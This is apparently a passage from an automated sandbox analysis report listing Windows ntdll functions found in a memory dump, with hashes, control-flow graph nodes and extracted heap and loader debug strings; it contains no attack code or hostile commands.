                                                                  • Instruction Fuzzy Hash: CF90023164950812D20072585654706100647D0301F65C412A042863CDC7A58A5565A2
                                                                  Function 32D72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 32d72b60-32d72b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2213e22be0dc61ccdfee670f50b2532ccd9ff3890559d9cffba3e899eabda11b
                                                                  • Instruction ID: 567bd14159241e5e07c36cd4353885bf5bfa9df130615ba2a8e88c2c4338850c
                                                                  • Opcode Fuzzy Hash: 2213e22be0dc61ccdfee670f50b2532ccd9ff3890559d9cffba3e899eabda11b
                                                                  • Instruction Fuzzy Hash: F090026124640413420572585554616400B47E0301B55C022E1018674DC53589956125
                                                                  Function 32D72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1 32d72c70-32d72c7c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a850b85b417947b495d68797135c41a11eda42bb13ffdc7dff7255d26f089085
                                                                  • Instruction ID: 5450738919a285eea4731224aabec6f07075f89aca693fd942c18e4ea0246e13
                                                                  • Opcode Fuzzy Hash: a850b85b417947b495d68797135c41a11eda42bb13ffdc7dff7255d26f089085
                                                                  • Instruction Fuzzy Hash: E690023124548C12D2107258954474A000647D0301F59C412A442873CDC6A589957121
                                                                  Function 32D72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2 32d72df0-32d72dfc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 8b10b4dcdfd4a50e01545fcd86ab42acc4b6bc5b405129fc303d17d634ee8be6
                                                                  • Instruction ID: 48ef859fc7585821f23b148b21779650f2a659a2fc5a24cd5a18681cec0b87ae
                                                                  • Opcode Fuzzy Hash: 8b10b4dcdfd4a50e01545fcd86ab42acc4b6bc5b405129fc303d17d634ee8be6
                                                                  • Instruction Fuzzy Hash: 0B90023124540823D21172585644707000A47D0341F95C413A042863CDD6668A56A121

                                                                  Non-executed Functions

                                                                  Function 32DB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 5328667da4d3084c1ef5e010b8625d5576332cd7b64dade22cd453bf69024a5c
                                                                  • Instruction ID: fdb151fbf65dc028763d7cee6b904f908bd4f2d78ce50f2a8ae7d91ee588b211
                                                                  • Opcode Fuzzy Hash: 5328667da4d3084c1ef5e010b8625d5576332cd7b64dade22cd453bf69024a5c
                                                                  • Instruction Fuzzy Hash: 97928E76608381AFEB20CE24C894B5BB7E8BF88754F50491DFA96D7750DB70D844CBA2
                                                                  Function 32DD94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 555 32dd94e0-32dd9529 556 32dd9578-32dd9587 555->556 557 32dd952b-32dd9530 555->557 558 32dd9534-32dd953a 556->558 559 32dd9589-32dd958e 556->559 557->558 560 32dd9695-32dd96bd call 32d79020 558->560 561 32dd9540-32dd9564 call 32d79020 558->561 562 32dd9d13-32dd9d27 call 32d74c30 559->562 571 32dd96dc-32dd9712 560->571 572 32dd96bf-32dd96da call 32dd9d2a 560->572 569 32dd9566-32dd9573 call 32df972b 561->569 570 32dd9593-32dd9634 GetPEB call 32dddc65 561->570 583 32dd967d-32dd9690 RtlDebugPrintTimes 569->583 581 32dd9636-32dd9644 570->581 582 32dd9652-32dd9667 570->582 573 32dd9714-32dd9716 571->573 572->573 573->562 578 32dd971c-32dd9731 RtlDebugPrintTimes 573->578 578->562 589 32dd9737-32dd973e 578->589 581->582 584 32dd9646-32dd964b 581->584 582->583 585 32dd9669-32dd966e 582->585 583->562 584->582 587 32dd9670 585->587 588 32dd9673-32dd9676 585->588 587->588 588->583 589->562 591 32dd9744-32dd975f 589->591 592 32dd9763-32dd9774 call 32dda808 591->592 595 32dd977a-32dd977c 592->595 596 32dd9d11 592->596 595->562 597 32dd9782-32dd9789 595->597 596->562 598 32dd98fc-32dd9902 597->598 599 32dd978f-32dd9794 597->599 600 32dd9a9c-32dd9aa2 598->600 601 32dd9908-32dd9937 call 32d79020 598->601 602 32dd97bc 599->602 603 32dd9796-32dd979c 599->603 606 32dd9af4-32dd9af9 600->606 607 32dd9aa4-32dd9aad 600->607 617 32dd9939-32dd9944 601->617 618 32dd9970-32dd9985 601->618 604 32dd97c0-32dd9811 call 32d79020 RtlDebugPrintTimes 602->604 603->602 608 32dd979e-32dd97b2 603->608 604->562 644 32dd9817-32dd981b 604->644 612 32dd9aff-32dd9b07 606->612 613 32dd9ba8-32dd9bb1 606->613 607->592 611 32dd9ab3-32dd9aef call 32d79020 607->611 614 32dd97b8-32dd97ba 608->614 615 32dd97b4-32dd97b6 608->615 638 32dd9ce9 611->638 621 32dd9b09-32dd9b0d 612->621 622 32dd9b13-32dd9b3d call 32dd8513 612->622 613->592 619 32dd9bb7-32dd9bba 613->619 614->604 615->604 624 32dd994f-32dd996e 617->624 625 32dd9946-32dd994d 617->625 629 32dd9987-32dd9989 618->629 630 32dd9991-32dd9998 618->630 626 32dd9c7d-32dd9cb4 call 32d79020 619->626 627 32dd9bc0-32dd9c0a 619->627 621->613 621->622 641 32dd9d08-32dd9d0c 622->641 642 32dd9b43-32dd9b9e call 32d79020 RtlDebugPrintTimes 622->642 637 32dd99d9-32dd99f6 RtlDebugPrintTimes 624->637 625->624 653 32dd9cbb-32dd9cc2 626->653 654 32dd9cb6 626->654 635 32dd9c0c 627->635 636 32dd9c11-32dd9c1e 627->636 639 32dd998f 629->639 640 32dd998b-32dd998d 629->640 632 32dd99bd-32dd99bf 630->632 645 32dd999a-32dd99a4 632->645 646 32dd99c1-32dd99d7 632->646 635->636 647 32dd9c2a-32dd9c2d 636->647 648 32dd9c20-32dd9c23 636->648 637->562 669 32dd99fc-32dd9a1f call 32d79020 637->669 649 32dd9ced 638->649 639->630 640->630 641->592 642->562 687 32dd9ba4 642->687 655 32dd981d-32dd9825 644->655 656 32dd986b-32dd9880 644->656 650 32dd99ad 645->650 651 32dd99a6 645->651 646->637 659 32dd9c2f-32dd9c32 647->659 660 32dd9c39-32dd9c7b 647->660 648->647 658 32dd9cf1-32dd9d06 RtlDebugPrintTimes 649->658 663 32dd99af-32dd99b1 650->663 651->646 661 32dd99a8-32dd99ab 651->661 664 32dd9ccd 653->664 665 32dd9cc4-32dd9ccb 653->665 654->653 666 32dd9827-32dd9850 call 32dd8513 655->666 667 32dd9852-32dd9869 655->667 668 32dd9886-32dd9894 656->668 658->562 658->641 659->660 660->658 661->663 671 32dd99bb 663->671 672 32dd99b3-32dd99b5 663->672 673 32dd9cd1-32dd9cd7 664->673 665->673 675 32dd9898-32dd98ef call 32d79020 RtlDebugPrintTimes 666->675 667->668 668->675 685 32dd9a3d-32dd9a58 669->685 686 32dd9a21-32dd9a3b 669->686 671->632 672->671 680 32dd99b7-32dd99b9 672->680 681 32dd9cde-32dd9ce4 673->681 682 32dd9cd9-32dd9cdc 673->682 675->562 691 32dd98f5-32dd98f7 675->691 680->632 681->649 688 32dd9ce6 681->688 682->638 689 32dd9a5d-32dd9a8b RtlDebugPrintTimes 685->689 686->689 687->613 688->638 689->562 693 32dd9a91-32dd9a97 689->693 691->641 693->619
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $ $0
                                                                  • API String ID: 3446177414-3352262554
                                                                  • Opcode ID: a6091cfe7df66e92c957b4de7d31829a25159983533bc919c34085ef034e744d
                                                                  • Instruction ID: f31df541de9866ef07a2d13a18e6b8cdaefedc4c9e7db19f3cd3ca360e4f0dc7
                                                                  • Opcode Fuzzy Hash: a6091cfe7df66e92c957b4de7d31829a25159983533bc919c34085ef034e744d
                                                                  • Instruction Fuzzy Hash: D13215B56087819FE310CF68C480B9BBBE5BF88348F10492DF59A87350DB76E949CB52
                                                                  Function 32D68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 764 32d68620-32d68681 765 32d68687-32d68698 764->765 766 32da5297-32da529d 764->766 766->765 767 32da52a3-32da52b0 GetPEB 766->767 767->765 768 32da52b6-32da52b9 767->768 769 32da52bb-32da52c5 768->769 770 32da52d6-32da52fc call 32d72ce0 768->770 769->765 771 32da52cb-32da52d4 769->771 770->765 775 32da5302-32da5306 770->775 773 32da532d-32da5341 call 32d354a0 771->773 779 32da5347-32da5353 773->779 775->765 777 32da530c-32da5321 call 32d72ce0 775->777 777->765 787 32da5327 777->787 781 32da5359-32da536d 779->781 782 32da555c-32da5568 call 32da556d 779->782 785 32da538b-32da5401 781->785 786 32da536f 781->786 782->765 792 32da543a-32da543d 785->792 793 32da5403-32da5435 call 32d2fd50 785->793 789 32da5371-32da5378 786->789 787->773 789->785 791 32da537a-32da537c 789->791 794 32da537e-32da5381 791->794 795 32da5383-32da5385 791->795 797 32da5443-32da5494 792->797 798 32da5514-32da5517 792->798 804 32da554d-32da5552 call 32dba4b0 793->804 794->789 795->785 799 32da5555-32da5557 795->799 805 32da54ce-32da5512 call 32d2fd50 * 2 797->805 806 32da5496-32da54cc call 32d2fd50 797->806 798->799 800 32da5519-32da5548 call 32d2fd50 798->800 799->779 800->804 804->799 805->804 806->804
                                                                  Strings
                                                                  • Thread identifier, xrefs: 32DA553A
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32DA54E2
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32DA54CE
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32DA540A, 32DA5496, 32DA5519
                                                                  • undeleted critical section in freed memory, xrefs: 32DA542B
                                                                  • corrupted critical section, xrefs: 32DA54C2
                                                                  • Invalid debug info address of this critical section, xrefs: 32DA54B6
                                                                  • 8, xrefs: 32DA52E3
                                                                  • Critical section address, xrefs: 32DA5425, 32DA54BC, 32DA5534
                                                                  • Address of the debug info found in the active list., xrefs: 32DA54AE, 32DA54FA
                                                                  • Critical section debug info address, xrefs: 32DA541F, 32DA552E
                                                                  • Critical section address., xrefs: 32DA5502
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 32DA5543
                                                                  • double initialized or corrupted critical section, xrefs: 32DA5508
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: 4ce0e3a0bf5252b1c3125f5c4e98eeb3e04c33e05a82c369b90264ceadaeccd8
                                                                  • Instruction ID: 25f84ea0807695df0cbdbe170897a655f139e8e572bf1ae8f9e1bee4c6358972
                                                                  • Opcode Fuzzy Hash: 4ce0e3a0bf5252b1c3125f5c4e98eeb3e04c33e05a82c369b90264ceadaeccd8
                                                                  • Instruction Fuzzy Hash: 9E8165B0E00358EFEB50CF94E840FAEBBB5AB48718F604199E944B7780D775A949CB60
                                                                  Function 32DE0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 935 32de0274-32de0296 call 32d87e54 938 32de0298-32de02b0 RtlDebugPrintTimes 935->938 939 32de02b5-32de02cd call 32d276b2 935->939 943 32de0751-32de0760 938->943 944 32de06f7 939->944 945 32de02d3-32de02e9 939->945 946 32de06fa-32de074e call 32de0766 944->946 947 32de02eb-32de02ee 945->947 948 32de02f0-32de02f2 945->948 946->943 950 32de02f3-32de030a 947->950 948->950 952 32de0310-32de0313 950->952 953 32de06b1-32de06ba GetPEB 950->953 952->953 954 32de0319-32de0322 952->954 956 32de06bc-32de06d7 GetPEB call 32d2b970 953->956 957 32de06d9-32de06de call 32d2b970 953->957 958 32de033e-32de0351 call 32de0cb5 954->958 959 32de0324-32de033b call 32d3ffb0 954->959 965 32de06e3-32de06f4 call 32d2b970 956->965 957->965 970 32de035c-32de0370 call 32d2758f 958->970 971 32de0353-32de035a 958->971 959->958 965->944 974 32de0376-32de0382 GetPEB 970->974 975 32de05a2-32de05a7 970->975 971->970 976 32de0384-32de0387 974->976 977 32de03f0-32de03fb 974->977 975->946 978 32de05ad-32de05b9 GetPEB 975->978 981 32de0389-32de03a4 GetPEB call 32d2b970 976->981 982 32de03a6-32de03ab call 32d2b970 976->982 979 32de04e8-32de04fa call 32d427f0 977->979 980 32de0401-32de0408 977->980 983 32de05bb-32de05be 978->983 984 32de0627-32de0632 978->984 1003 32de0590-32de059d call 32de11a4 call 32de0cb5 979->1003 1004 32de0500-32de0507 979->1004 980->979 989 32de040e-32de0417 980->989 993 32de03b0-32de03d1 call 32d2b970 GetPEB 981->993 982->993 985 32de05dd-32de05e2 call 32d2b970 983->985 986 32de05c0-32de05db GetPEB call 32d2b970 983->986 984->946 990 32de0638-32de0643 984->990 1002 32de05e7-32de05fb call 32d2b970 985->1002 986->1002 996 32de0438-32de043c 989->996 997 32de0419-32de0429 989->997 990->946 998 32de0649-32de0654 990->998 993->979 1023 32de03d7-32de03eb 993->1023 1007 32de044e-32de0454 996->1007 1008 32de043e-32de044c call 32d63bc9 996->1008 997->996 1005 32de042b-32de0435 call 32dedac6 997->1005 998->946 1006 32de065a-32de0663 GetPEB 998->1006 1034 32de05fe-32de0608 GetPEB 1002->1034 1003->975 1012 32de0509-32de0510 1004->1012 1013 32de0512-32de051a 1004->1013 1005->996 1016 32de0665-32de0680 GetPEB call 32d2b970 1006->1016 1017 32de0682-32de0687 call 32d2b970 1006->1017 1009 32de0457-32de0460 1007->1009 1008->1009 1021 32de0472-32de0475 1009->1021 1022 32de0462-32de0470 1009->1022 1012->1013 1025 32de051c-32de052c 1013->1025 1026 32de0538-32de053c 1013->1026 1031 32de068c-32de06ac call 32dd86ba call 32d2b970 1016->1031 1017->1031 1032 32de0477-32de047e 1021->1032 1033 32de04e5 1021->1033 1022->1021 1023->979 1025->1026 1035 32de052e-32de0533 call 32dedac6 1025->1035 1037 32de053e-32de0551 call 32d63bc9 1026->1037 1038 32de056c-32de0572 1026->1038 1031->1034 1032->1033 1040 32de0480-32de048b 1032->1040 1033->979 1034->946 1042 32de060e-32de0622 1034->1042 1035->1026 1049 32de0563 1037->1049 1050 32de0553-32de0561 call 32d5fe99 1037->1050 1041 32de0575-32de057c 1038->1041 1040->1033 1047 32de048d-32de0496 GetPEB 1040->1047 1041->1003 1048 32de057e-32de058e 1041->1048 1042->946 1052 32de0498-32de04b3 GetPEB call 32d2b970 1047->1052 1053 32de04b5-32de04ba call 32d2b970 1047->1053 1048->1003 1055 32de0566-32de056a 1049->1055 1050->1055 1061 32de04bf-32de04dd call 32dd86ba call 32d2b970 1052->1061 1053->1061 1055->1041 1061->1033
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 3446177414-1700792311
                                                                  • Opcode ID: 4c051e89c94b8efa16feb914cc1ecde59b5c6bdd4fb33f39d5929897683cb567
                                                                  • Instruction ID: 9752548299aa05b0c95d24005f25ce0d6896f6dd491366416acdd0fff1d8a7b5
                                                                  • Opcode Fuzzy Hash: 4c051e89c94b8efa16feb914cc1ecde59b5c6bdd4fb33f39d5929897683cb567
                                                                  • Instruction Fuzzy Hash: ABD1CAB5500785DFDB02DF68E440AADBBF1FF4A709F448049E886AB761CB749985CF20
                                                                  Function 32DE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                  • API String ID: 0-3591852110
                                                                  • Opcode ID: c32023af11bc547fc21dff5d495b59e6657b71b55522b47d6e413e4b0d2010e8
                                                                  • Instruction ID: bccecbaa166ae73983b89e5edc58c512bff78dd9530674b1294c48d7e889af75
                                                                  • Opcode Fuzzy Hash: c32023af11bc547fc21dff5d495b59e6657b71b55522b47d6e413e4b0d2010e8
                                                                  • Instruction Fuzzy Hash: BF1278B4600742EFE7158F24C481BAAFBE1FF09B18F548499E8968B751DB74EC85CB60
                                                                  Function 32D2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                  • API String ID: 0-3532704233
                                                                  • Opcode ID: cf919e77dc42d024b1ec6c295f619c008ce72ffa3a715a5a61bac278cb894fe5
                                                                  • Instruction ID: 984191a555a8bd48982b24fe8f96dac9cdba3ab677c4d115fe885437a0b4daed
                                                                  • Opcode Fuzzy Hash: cf919e77dc42d024b1ec6c295f619c008ce72ffa3a715a5a61bac278cb894fe5
                                                                  • Instruction Fuzzy Hash: FBB1BCB25083959FD715CF28C480B5BB7E8AF88748F41492EF888D7314DBB0D949CBA2
                                                                  Function 32D41070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 3446177414-3570731704
                                                                  • Opcode ID: 68aeb8607e1da6e2999f6d2030fd7d3db796eecc7791813074a97310fa3a025e
                                                                  • Instruction ID: dee48f852660071c359282f9898224fb1ffdc1fa5cb7da50db4e1080c02e6b4a
                                                                  • Opcode Fuzzy Hash: 68aeb8607e1da6e2999f6d2030fd7d3db796eecc7791813074a97310fa3a025e
                                                                  • Instruction Fuzzy Hash: DA925675A01368CFEB24CF29C880B99B7B1BF45754F1581EAE949A7380DB709E80CF61
                                                                  Function 32D5D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 32D5D959
                                                                    • Part of subcall function 32D34859: RtlDebugPrintTimes.NTDLL ref: 32D348F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1975516107
                                                                  • Opcode ID: f74d3728e8994714b6c30a32131fbe6f4796c82b16284c9b7b93eea46fb5dc92
                                                                  • Instruction ID: 40866c3d865b3f32fb732193050398f26a22a12fde1c3b7014703c416cc3e6fd
                                                                  • Opcode Fuzzy Hash: f74d3728e8994714b6c30a32131fbe6f4796c82b16284c9b7b93eea46fb5dc92
                                                                  • Instruction Fuzzy Hash: 8751E075A003459FEF08DFA4C58178EBBB1BF48B18F614559D8526B388CBB4A885CFA0
                                                                  Function 32DC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                  • API String ID: 0-3063724069
